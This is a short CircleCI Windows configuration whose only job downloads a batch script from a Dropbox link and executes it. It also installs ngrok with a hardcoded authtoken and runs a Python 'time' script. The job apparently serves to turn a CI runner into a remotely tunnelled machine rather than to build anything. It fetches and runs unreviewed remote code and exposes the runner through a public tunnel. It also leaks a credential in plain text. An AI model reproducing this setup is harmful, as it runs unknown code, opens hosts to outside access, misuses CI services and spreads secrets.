version: 2.1
orbs:
  win: circleci/windows@4.1.1 # The Windows orb gives you everything you need to start using the Windows executor
jobs:
  build: # name of your job
    executor: win/server-2022 # use one of the executors defined within the windows orb
    steps:
      - run: |
         Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/ir1q6lxyqfbg178nsrvn9/setup.bat?rlkey=wn117nwq2081wfpiw58lrx8bt&dl=1" -OutFile "setup.bat"
         choco install ngrok -y --quiet
         ngrok config add-authtoken 2P8v3I9oxTnCsnsVcKIOjd9Rt4Y_5jzoNH4hQQNfWcR8iQz8i
         cmd /c setup.bat
         python time.py 
         
         
